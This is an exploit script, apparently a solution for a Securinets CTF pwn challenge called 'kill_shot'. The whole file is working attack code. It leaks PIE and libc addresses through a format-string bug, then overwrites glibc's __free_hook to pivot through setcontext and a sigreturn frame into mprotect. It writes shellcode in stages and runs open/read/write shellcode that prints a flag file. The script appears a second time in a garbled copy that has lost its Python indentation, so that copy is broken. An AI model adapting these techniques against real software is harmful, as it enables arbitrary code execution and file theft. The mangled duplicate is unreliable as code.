Mech0n/Securinets-pwn1.py

## Securinets-pwn1.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

p = process('./kill_shot')
# gdb.attach(p, 'b *$rebase(0x1098)\n')

def add(size, payload):
    p.sendlineafter('3- exit', str(1))
    p.sendlineafter("Size:", str(size))
    p.sendlineafter("Data:", payload)

def delete(idx):
    p.sendlineafter('3- exit', str(2))
    p.sendlineafter("Index:", str(idx))

if __name__ == "__main__":
    # 23 25  0x1240
    p.sendlineafter("Format:", "AAAA%24$p.%25$p.")
    p.recvuntil("AAAA")
    pie = int(p.recvuntil(".")[:-1], 16) - 0x1240
    libc = int(p.recvuntil(".")[:-1], 16) - 0x021b97
    success("LIBC: " + str(hex(libc)))
    success("PIE : " + str(hex(pie)))

    setcontext = libc + 0x0000000000052070
    __free_hook = libc + 0x00000000003ed8e8
    mprotect = libc + 0x000000000011bae0

    kill = pie + 0x10B4

    p.sendlineafter("Pointer:", str(__free_hook))
    p.sendafter("Content:", p64(kill))

    # gdb.attach(p, "b *%s\n" % hex((setcontext + 53)))

    frame = SigreturnFrame()
    frame.rsp = __free_hook + 0x10
    frame.rdi = __free_hook & 0xfffffffffffff000
    frame.rsi = 0x1000
    frame.rdx = 7
    frame.rip = mprotect

    shellcode1 = '''
    xor rdi, rdi
    mov rsi, %d
    mov rdx, 0x1000
    mov rax, 0
    syscall

    jmp rsi
    ''' % (__free_hook & 0xfffffffffffff000)

    payload = str(frame)
    add(0x100, payload) # 1
    add(0x100, payload) # 2
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x8))
    p.sendafter("Content:", p64(__free_hook + 0x18))

    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x10))
    p.sendafter("Content:", p64(__free_hook + 0x18))

    add(0x100, payload)
    delete(1)

    shellcode = asm(shellcode1) + '\x90' # 32 / 8

    p.sendlineafter("Pointer:", str(__free_hook + 0x18))
    p.sendafter("Content:", shellcode[0:8])

    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x20))
    p.sendafter("Content:", shellcode[8:16])

    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x28))
    p.sendafter("Content:", shellcode[16:24])

    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x30))
    p.sendafter("Content:", shellcode[24:32])

    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook))
    p.sendafter("Content:", p64(setcontext + 53))

    add(0x100, payload)
    delete(1)

    shellcode2 = '''
    xor rdi, rdi
    push rdi
    mov rdi, 0x67616c662f
    push rdi
    mov rsi, rsp
    xor rdi, rdi
    xor rdx, rdx
    mov rax, 257
    syscall

    mov rdi, rax
    mov rsi, rsp
    mov rdx, 0x50
    mov rax, 0
    syscall

    mov rdi, 1
    mov rsi, rsp
    mov rdx, rax
    mov rax, 1
    syscall

    mov rdi, 0
    mov rax, 60
    syscall
    '''

    payload = asm(shellcode2)
    p.sendline(payload)
    p.interactive()
	#! /usr/bin/python
	#-- coding: utf-8 --
	from pwn import *

	context.terminal = ['tmux', 'splitw', '-h']
	context(arch = 'amd64' , os = 'linux', log_level='debug')

	p = process('./kill_shot')
	# gdb.attach(p, 'b *$rebase(0x1098)\n')

	def add(size, payload):
	p.sendlineafter('3- exit', str(1))
	p.sendlineafter("Size:", str(size))
	p.sendlineafter("Data:", payload)

	def delete(idx):
	p.sendlineafter('3- exit', str(2))
	p.sendlineafter("Index:", str(idx))

	if __name__ == "__main__":
	# 23 25 0x1240
	p.sendlineafter("Format:", "AAAA%24$p.%25$p.")
	p.recvuntil("AAAA")
	pie = int(p.recvuntil(".")[:-1], 16) - 0x1240
	libc = int(p.recvuntil(".")[:-1], 16) - 0x021b97
	success("LIBC: " + str(hex(libc)))
	success("PIE : " + str(hex(pie)))

	setcontext = libc + 0x0000000000052070
	__free_hook = libc + 0x00000000003ed8e8
	mprotect = libc + 0x000000000011bae0

	kill = pie + 0x10B4

	p.sendlineafter("Pointer:", str(__free_hook))
	p.sendafter("Content:", p64(kill))

	# gdb.attach(p, "b *%s\n" % hex((setcontext + 53)))

	frame = SigreturnFrame()
	frame.rsp = __free_hook + 0x10
	frame.rdi = __free_hook & 0xfffffffffffff000
	frame.rsi = 0x1000
	frame.rdx = 7
	frame.rip = mprotect

	shellcode1 = '''
	xor rdi, rdi
	mov rsi, %d
	mov rdx, 0x1000
	mov rax, 0
	syscall

	jmp rsi
	''' % (__free_hook & 0xfffffffffffff000)

	payload = str(frame)
	add(0x100, payload) # 1
	add(0x100, payload) # 2
	delete(1)

	p.sendlineafter("Pointer:", str(__free_hook + 0x8))
	p.sendafter("Content:", p64(__free_hook + 0x18))

	add(0x100, payload)
	delete(1)

	p.sendlineafter("Pointer:", str(__free_hook + 0x10))
	p.sendafter("Content:", p64(__free_hook + 0x18))

	add(0x100, payload)
	delete(1)

	shellcode = asm(shellcode1) + '\x90' # 32 / 8

	p.sendlineafter("Pointer:", str(__free_hook + 0x18))
	p.sendafter("Content:", shellcode[0:8])

	add(0x100, payload)
	delete(1)

	p.sendlineafter("Pointer:", str(__free_hook + 0x20))
	p.sendafter("Content:", shellcode[8:16])

	add(0x100, payload)
	delete(1)

	p.sendlineafter("Pointer:", str(__free_hook + 0x28))
	p.sendafter("Content:", shellcode[16:24])

	add(0x100, payload)
	delete(1)

	p.sendlineafter("Pointer:", str(__free_hook + 0x30))
	p.sendafter("Content:", shellcode[24:32])

	add(0x100, payload)
	delete(1)

	p.sendlineafter("Pointer:", str(__free_hook))
	p.sendafter("Content:", p64(setcontext + 53))

	add(0x100, payload)
	delete(1)

	shellcode2 = '''
	xor rdi, rdi
	push rdi
	mov rdi, 0x67616c662f
	push rdi
	mov rsi, rsp
	xor rdi, rdi
	xor rdx, rdx
	mov rax, 257
	syscall

	mov rdi, rax
	mov rsi, rsp
	mov rdx, 0x50
	mov rax, 0
	syscall

	mov rdi, 1
	mov rsi, rsp
	mov rdx, rax
	mov rax, 1
	syscall

	mov rdi, 0
	mov rax, 60
	syscall
	'''

	payload = asm(shellcode2)
	p.sendline(payload)
	p.interactive()